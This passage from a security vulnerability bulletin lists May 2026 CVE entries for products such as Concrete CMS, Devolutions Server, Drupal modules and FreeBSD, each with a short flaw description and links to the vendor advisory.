| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/logs/delete. The The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8409 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/logs/bulk/delete. The The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8410 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/delete. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8411 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/cache. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8412 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/design. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8413 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/event/duplicate. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8414 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/express/association/reorder. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8415 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file addFavoriteFolder($id). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8416 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/update/do_update/<pkgHandle>. The do_update() method in concrete/controllers/single_page/dashboard/extend/update.php checks only canInstallPackages() before executing upgradeCoreData() and upgrade() on the named package’s controller. Because the endpoint is a state-changing GET route with no token enforcement, an attacker can force an authenticated administrator to trigger a package upgrade via a single cross-site navigation.In order to be vulnerable, the victim must be passing canInstallPackages() and and a target package must already be already installed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8417 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below contains a CSRF vulnerability in the install_package() method of concrete/controllers/single_page/dashboard/extend/install.php. An attacker who can cause an authenticated administrator to visit a crafted page, and who has placed or caused a package to be present under DIR_PACKAGES/<handle>/, can force the installation of that package without any CSRF protection. Package installation executes the package controller’s install() method as the web server user, enabling remote code execution. In order to be vulnerable, the victim must be passing canInstallPackages. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8421 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/update/prepare_remote_upgrade/<remoteMPID>. An attacker who controls the remote package returned for a known marketplace item ID can overwrite the package PHP on disk and force its upgrade() method to execute in a single browser navigation. This results in remote code execution as the web server user. In order to be vulnerable, the victim must be passing canInstallPackages, victim site must be connected to the Concrete marketplace; and the attacker controls the package returned for a marketplace item ID already installed on the victim site. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8426 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file removeFavoriteFolder($id). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8427 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below emits a CSRF token in the local_available_update.php view ($token->output(‘do_update’)) but the corresponding do_update() method in concrete/controllers/single_page/dashboard/system/update/update.php never calls $this->token->validate(‘do_update’). The form is rendered as a POST form, meaning the token reaches the browser, but because the controller discards it without verification, an attacker can craft a cross-site POST that triggers a core CMS update to an attacker-specified version string. In order to be vulnerable, theictim must be passing canUpgrade()anda valid update version must be present under DIR_CORE_UPDATES. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8428 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file star(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8432 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file rescan(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8433 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file rescanMultiple(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8434 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file approveVersion(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8435 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Creartia Internet Consulting–ICMS Content Management | Authorization Bypass vulnerability in Creartia’s ICMS software could allow an attacker to gain unauthorized access to protected features by manipulating the HTTP redirect headers of the login process, causing the script to continue running and enabling privilege escalation without the need for credentials. | 2026-05-18 | not yet calculated | CVE-2026-4320 | https://www.incibe.es/en/incibe-cert/notices/aviso/authorization-bypass-icms-content-management-creartia-internet-consulting |
| cyntler–react-doc-viewer v1.17.1 | Cross-Site Scripting (XSS) vulnerability in @cyntler/react-doc-viewer v1.17.1 allows remote attackers to execute arbitrary JavaScript via a crafted .txt file. The TXTRenderer component fails to sanitize file content and explicitly casts raw data as a ReactNode | 2026-05-20 | not yet calculated | CVE-2026-30691 | https://github.com/cyntler/react-doc-viewer/issues/317 https://github.com/walidriouah/CVE-2026-30691 |
| Dell–Portrait Dell Color Management Application | An issue was discovered in the Portrait Dell Color Management application before 3.7.0 for Dell monitors. On Windows, a symbolic link vulnerability allows a local low-privileged user to escalate privileges to Administrator. During installation, the software writes the file CCFLFamily_07Feb11.edr to C:ProgramDataPortrait DisplaysCWdatai1D3 while running with elevated privileges. Because the installer does not properly validate symbolic links or reparse points at the destination path, an attacker can create a malicious link that redirects the write operation to an arbitrary system location, enabling arbitrary file creation or overwrite with elevated privileges. | 2026-05-19 | not yet calculated | CVE-2026-34883 | https://www.portrait.com/dell-security-cve-updates/ https://www.portrait.com/dell |
| Devolutions–Server | Improper access control in the entry activity log feature in Devolutions Server allows an authenticated user with access to an entry but without the required permission to retrieve that entry’s activity logs via a crafted API request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-5171 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Improper authorization in the Active Directory browsing feature in Devolutions Server allows a low-privileged authenticated user to obtain authentication material associated with a stored PAM provider service account via authentication relay to an attacker-controlled server. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-7325 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Improper enforcement of the sealed-entry workflow in the entry sensitive-data retrieval feature in Devolutions Server allows an authenticated user with access to a sealed entry to retrieve its sensitive data without triggering the unseal audit notification via a crafted API request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-8477 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Improper handling of factor key state in the multi-factor authentication management feature in Devolutions Server allows an attacker with knowledge of a user’s password to bypass the user’s multi-factor authentication after the user reconfigures their factors. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 | 2026-05-22 | not yet calculated | CVE-2026-9047 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Missing authorization in the vault import feature in Devolutions Server 2026.1.16.0 and earlier allows a low-privileged authenticated user to create new vaults via a crafted import request. | 2026-05-22 | not yet calculated | CVE-2026-9223 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Missing authorization in the user profile update feature in Devolutions Server allows an authenticated Active Directory user to modify their own profile attributes via a crafted API request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9224 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Improper input validation in the external authentication provider flow in Devolutions Server allows an unauthenticated remote attacker to redirect victims to an attacker-controlled domain via a crafted login link. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9245 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Improper access control in the entry documentation and attachment features in Devolutions Server allows an authenticated user with vault read access to retrieve the documentation and attachments of sealed entries via a crafted API request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9246 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Insufficient logging in the entry export feature in Devolutions Server allows an authenticated user with export permissions to export a sealed entry without triggering the unseal notification to administrators via a crafted export request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9247 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Authorization bypass in the entry duplication feature in Devolutions Server allows an authenticated user with write access to any vault to copy documentation and attachments from an entry in a vault they cannot access via a crafted save request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9248 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Unverified password change in Devolutions Server allows an attacker to change a user’s password without providing the previous one via a crafted password change request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9249 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions–Server | Missing authorization in the entry status management feature in Devolutions Server allows a non-administrator authenticated user to bypass the administrator-enforced Pending Approval flow and gain access to an entry’s data via a crafted status change request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9251 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| discourse–discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, an authenticated user on a Discourse instance with the form templates feature enabled can read the name and structured content of form templates that are intended exclusively for categories they are not authorized to access. Impact is limited to disclosure of site configuration metadata. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. | 2026-05-19 | not yet calculated | CVE-2026-33514 | https://github.com/discourse/discourse/security/advisories/GHSA-w6g7-p2p9-2m5h https://github.com/discourse/discourse/commit/ae5c9570fb918442c4d96abc83c1e7e169909b02 |
| discourse–discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, a vulnerability in the discourse-subscriptions plugin allows users to gain access to subscription-gated groups without completing payment. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. | 2026-05-19 | not yet calculated | CVE-2026-34154 | https://github.com/discourse/discourse/security/advisories/GHSA-pjgj-7mjq-6j7g |
| Drupal–Colorbox Inline | Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Colorbox Inline allows Cross-Site Scripting (XSS). This issue affects Colorbox Inline: from 0.0.0 before 2.1.1. | 2026-05-19 | not yet calculated | CVE-2026-8493 | https://www.drupal.org/sa-contrib-2026-036 |
| Drupal–Date iCal | Missing Authorization vulnerability in Drupal Date iCal allows Forceful Browsing. This issue affects Date iCal: from 0.0.0 before 4.0.15. | 2026-05-19 | not yet calculated | CVE-2026-8495 | https://www.drupal.org/sa-contrib-2026-037 |
| Drupal–Drupal core | Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Drupal core allows Cross-Site Scripting (XSS). This issue affects Drupal core: from 8.0.0 before 10.5.9, from 10.6.0 before 10.6.7, from 11.0.0 before 11.2.11, from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6365 | https://www.drupal.org/sa-core-2026-001 |
| Drupal–Drupal core | Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection. This issue affects Drupal core: from 8.0.0 before 10.5.9, from 10.6.0 before 10.6.7, from 11.0.0 before 11.2.11, from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6366 | https://www.drupal.org/sa-core-2026-002 |
| Drupal–Drupal core | Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Drupal core allows Cross-Site Scripting (XSS). This issue affects Drupal core: from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6367 | https://www.drupal.org/sa-core-2026-003 |
| Drupal–Node View Permissions | Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal Node View Permissions allows Forceful Browsing. This issue affects Node View Permissions: from 0.0.0 before 1.7.0, from 2.0.0 before 2.0.1. | 2026-05-19 | not yet calculated | CVE-2026-8491 | https://www.drupal.org/sa-contrib-2026-034 |
| Drupal–Obfuscate | Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Obfuscate allows Cross-Site Scripting (XSS). This issue affects Obfuscate: from 0.0.0 before 2.0.2. | 2026-05-19 | not yet calculated | CVE-2026-6871 | https://www.drupal.org/sa-contrib-2026-033 |
| Drupal–Orejime | Improper Neutralization of Input During Web Page Generation (“Cross-site Scripting”) vulnerability in Drupal Orejime allows Cross-Site Scripting (XSS). This issue affects Orejime: from 0.0.0 before 2.0.16. | 2026-05-19 | not yet calculated | CVE-2026-6095 | https://www.drupal.org/sa-contrib-2026-032 |
| Drupal–Simple Hierarchical Select (shs) | Simple Hierarchical Select (SHS) for Drupal 7 contains cross-site scripting risk due to improper output escaping of term-derived text. Confirmed affected paths include field formatter output (shs_field_formatter_view) and term-tree child-term data generation (shs_term_get_children). Malicious taxonomy term names can be rendered unsafely depending on output context. This affects versions from 7.x-1.0 through (and including) 7.x-1.10. | 2026-05-21 | not yet calculated | CVE-2026-4929 | NES patch branch comparison https://d7es.tag1.com/security-advisories/simple-hierarchical-select-moderately-critical-cross-site-scripting |
| Drupal–Term Reference Tree | In the Drupal 7 Term Reference Tree module, two stored XSS vectors exist in the widget/formatter rendering pipeline. Vector A (token display templates): When the Token module is enabled and token display templates are configured, attacker-controlled token output (e.g., term description) is rendered without proper sanitization. Any user who can edit the referenced taxonomy terms can inject HTML/JS that executes when the field is rendered. Vector B (term label rendering): Taxonomy term labels are not properly sanitized before being rendered in the widget, allowing a user with permission to create or edit taxonomy terms to inject scripts into the term name that execute when a form containing the widget is viewed. Exploit affects versions 7.x-1.x up to and including 7.x-1.11. | 2026-05-21 | not yet calculated | CVE-2026-4093 | https://www.herodevs.com/vulnerability-directory/cve-2026-4093 https://d7es.tag1.com/security-advisories/taxonomy-term-reference-tree-widget-moderately-critical-cross-site-scripting |
| Drupal–Translate Drupal with GTranslate | Modification of Assumed-Immutable Data (MAID) vulnerability in Drupal Translate Drupal with GTranslate allows Resource Location Spoofing. This issue affects Translate Drupal with GTranslate: from 0.0.0 before 3.0.5. | 2026-05-19 | not yet calculated | CVE-2026-8492 | https://www.drupal.org/sa-contrib-2026-035 |
| Easy Chat–Easy Chat Server 3.1 | Directory Traversal vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the UserName parameter | 2026-05-22 | not yet calculated | CVE-2026-36227 | http://easy.com https://github.com/NullByte8080/CVE-2026-36227 |
| Easy Chat–Easy Chat Server 3.1 | Buffer Overflow vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the chat message functionality | 2026-05-22 | not yet calculated | CVE-2026-36228 | http://easy.com https://github.com/NullByte8080/CVE-2026-36228 |
| Espon–Epson L14150 FL27PB | Buffer Overflow vulnerability in EPSON L14150 FL27PB allows a remote attacker to execute arbitrary code via the RAW Printing Service (JetDirect) on TCP port 9100 | 2026-05-20 | not yet calculated | CVE-2026-39047 | https://github.com/AzhariRamadhan/CVE-PORT-9100 https://gist.github.com/AzhariRamadhan/1defc815542fb72e6025da2ce53a1046 |
| Follett–Software’s Destiny Library Manager | Directory traversal in Follett Software’s Destiny Library Manager 22_0_2_rc1 and fixed in v.22.5 AU1 allows remote attackers to read arbitrary system and application files via the image parameter | 2026-05-22 | not yet calculated | CVE-2025-45145 | http://follett.com https://medium.com/@jaredutahusa/cve-2025-45145-unauthenticated-local-file-inclusion-in-fsc-destiny-40a3f11b3a4d |
| frappe–frappe | Frappe is a full-stack web application framework. Versions prior to 15.105.0 and 16.15.0 contain a possible Arbitrary File Read vulnerability via Path Traversal. The issue is resolved in versions 16.15.0, 15.105.0 and above. | 2026-05-20 | not yet calculated | CVE-2026-39352 | https://github.com/frappe/frappe/security/advisories/GHSA-67rf-pxgh-vfqv https://github.com/frappe/frappe/releases/tag/v16.15.0 |
| frappe–lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. In versions 2.50.0 and below, a user with course editing role could upload a SCORM ZIP package to write files outside the intended directory. This issue has been resolved in version 2.50.1. | 2026-05-20 | not yet calculated | CVE-2026-39405 | https://github.com/frappe/lms/security/advisories/GHSA-mxh7-g3r7-g96h https://github.com/frappe/lms/releases/tag/v2.50.1 |
| FreeBSD–FreeBSD | libcasper(3) communicates with helper processes via UNIX domain sockets, and uses the select(2) system call to wait for data to become available. However, it does not verify that its socket descriptor fits within select(2)’s descriptor set size limit of FD_SETSIZE (1024). An attacker able to cause an application using libcasper(3) to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, may trigger stack corruption. If the target application runs with setuid root privileges, this could be used to escalate local privileges. | 2026-05-21 | not yet calculated | CVE-2026-39461 | https://security.freebsd.org/advisories/FreeBSD-SA-26:22.libcasper.asc |
| FreeBSD–FreeBSD | The setcred(2) system call is only available to privileged users. However, before the privilege level of the caller is checked, the user-supplied list of supplementary groups is copied into a fixed-size kernel stack buffer without first validating its length. If the supplied list exceeds the capacity of that buffer, a stack buffer overflow occurs. Because the bounds check on the supplementary groups list occurs after the kernel stack buffer has already been written, an unprivileged local user may trigger the overflow without holding any special privilege. Successful exploitation may allow an attacker to execute arbitrary code in the context of the kernel, allowing an unprivileged local user to gain elevated privileges on the affected system. | 2026-05-21 | not yet calculated | CVE-2026-45250 | https://security.freebsd.org/advisories/FreeBSD-SA-26:18.setcred.asc |
| FreeBSD–FreeBSD | A file descriptor can be closed while a thread is blocked in a poll(2) or select(2) call waiting for that descriptor. Because the blocked thread does not hold a reference to the underlying object, this closure may result in the object being freed while the thread remains blocked. In this situation, the kernel must remove the blocked thread from the per-object wait queue prior to freeing the object. In the case of some file descriptor types, the kernel failed to unlink blocked threads from the object before freeing it. When the blocked thread is subsequently woken, it accesses memory that has already been freed resulting in a use-after-free vulnerability. The use-after-free vulnerability may be triggered by an unprivileged local user and can be exploited to obtain superuser privileges. | 2026-05-21 | not yet calculated | CVE-2026-45251 | https://security.freebsd.org/advisories/FreeBSD-SA-26:19.file.asc |
| FreeBSD–FreeBSD | When a fusefs file system implements extended attributes, the kernel may send a FUSE_LISTXATTR message to the userspace daemon to retrieve the list of extended attributes for a given file. The FUSE protocol requires the daemon to return a packed list of NUL-terminated strings. The fusefs kernel module calls strlen() on this daemon-supplied buffer without first verifying that the entire list is NUL-terminated. If a malicious daemon sends a non-NUL-terminated list, the fusefs kernel module may read beyond the end of one heap-allocated buffer and potentially write beyond the end of a second buffer. A malicious daemon could disclose up to 253 bytes of kernel heap memory, or it could inject up to 250 attacker-controlled bytes into unallocated kernel heap space. | 2026-05-21 | not yet calculated | CVE-2026-45252 | https://security.freebsd.org/advisories/FreeBSD-SA-26:20.fusefs.asc |
| FreeBSD–FreeBSD | ptrace(PT_SC_REMOTE) failed to properly validate parameters for the syscall(2) and __syscall(2) meta-system calls. As a result, a user with the ability to debug a process may trigger arbitrary code execution in the kernel, even if the target process has no special privileges. The missing validation allows an unprivileged local user to escalate privileges, potentially gaining full control of the affected system. | 2026-05-21 | not yet calculated | CVE-2026-45253 | https://security.freebsd.org/advisories/FreeBSD-SA-26:21.ptrace.asc |
| FreeBSD–FreeBSD | In the case of the cap_net service, when a key present in the old limit was omitted from the new limit, the missing key was treated as “allow any” instead of being rejected. In certain scenarios, an application that had previously restricted a subset of network operations could ask for a new limit that extended the permissions of the process. | 2026-05-21 | not yet calculated | CVE-2026-45254 | https://security.freebsd.org/advisories/FreeBSD-SA-26:24.cap_net.asc |
| FreeBSD–FreeBSD | When bsdinstall or bsdconfig are prompted to scan for nearby Wi-Fi networks, they build up a list of network names and use bsddialog(1) to prompt the user to select a network. This is implemented using a shell script, and the code which handled network names was not careful to prevent expansion by the shell. As a result, a suitably crafted network name can be used to execute commands via a subshell. The problem can be exploited to execute code as root on the system running bsdinstall or bsdconfig. The attacker would need to create an access point with a specially crafted name and be within range of a Wi-Fi scan. Note that bsdinstall and bsdconfig are vulnerable as soon as the user prompts them to scan for nearby networks; they do not need to actually select the malicious network. | 2026-05-21 | not yet calculated | CVE-2026-45255 | https://security.freebsd.org/advisories/FreeBSD-SA-26:23.bsdinstall.asc |
| FreePBX–security-reporting | FreePBX is an open source IP PBX. In versions below 16.0.71 and 17.0.6, the backup module does not properly sanitize data during restore operations, potentially leading to compromise if the backup contains carefully crafted hostile data. During backup restore operations, FreePBX extracts selected files from a user-supplied tar archive. If a malicious file exists in the archive, it is read and passed directly to unserialize() without validation, class restrictions, or integrity checks. This issue allows Remote Code Execution during restoration of the backup as the web server user (typically asterisk or www-data). The attack does not require shell access, CLI access, or filesystem write permissions beyond the normal restore workflow. Authentication with a known username that has sufficient access permissions and/or write access to backup files is required. This issue has been fixed in versions 16.0.71 and 17.0.6. | 2026-05-18 | not yet calculated | CVE-2026-26978 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-5v7h-49gr-jcwr https://github.com/FreePBX/backup/commit/45c57e1207cbf9fd1c5f76f8a3e72d204a69a472 https://github.com/FreePBX/backup/commit/64781af5c80cce0cff21a981be4d8e6a7a71f2c4 |
| glpi-project–glpi | GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, an authenticated user with forms READ permission can export the structure of unauthorized forms. This issue has been fixed in version 11.0.7. | 2026-05-18 | not yet calculated | CVE-2026-32312 | https://github.com/glpi-project/glpi/security/advisories/GHSA-cg63-qchq-q626 https://github.com/glpi-project/glpi/releases/tag/11.0.7 |
| goauthentik–authentik | authentik is an open-source identity provider. In versions prior to 2025.12.5 and 2026.2.0-rc1 through 2026.2.2, authenticated non-admin users with at least one OAuth2 access token can retrieve the client_secret of confidential OAuth2 providers they have previously authenticated against, exposing sensitive information to users without the correct permissions. This logic is GET /api/v3/oauth2/access_tokens/. The API response includes a nested provider object containing client_id and client_secret for providers configured with client_type: confidential, which should not be accessible to low-privilege users. This issue has been fixed in versions 2025.12.5 and 2026.2.3. | 2026-05-22 | not yet calculated | CVE-2026-40166 | https://github.com/goauthentik/authentik/security/advisories/GHSA-hhpc-rqgm-pxj4 https://github.com/goauthentik/authentik/releases/tag/version%2F2025.12.5 https://github.com/goauthentik/authentik/releases/tag/version%2F2026.2.3 |
| gohttp–gohttp | An issue in gohttp commit 34ea51 allows attackers to execute a directory traversal via supplying a crafted request. | 2026-05-19 | not yet calculated | CVE-2025-70950 | https://github.com/itang/gohttp/issues/13 https://gist.github.com/Lime-Cocoa/202127ae5f4dcc4b39909ce7ac1c8466 |
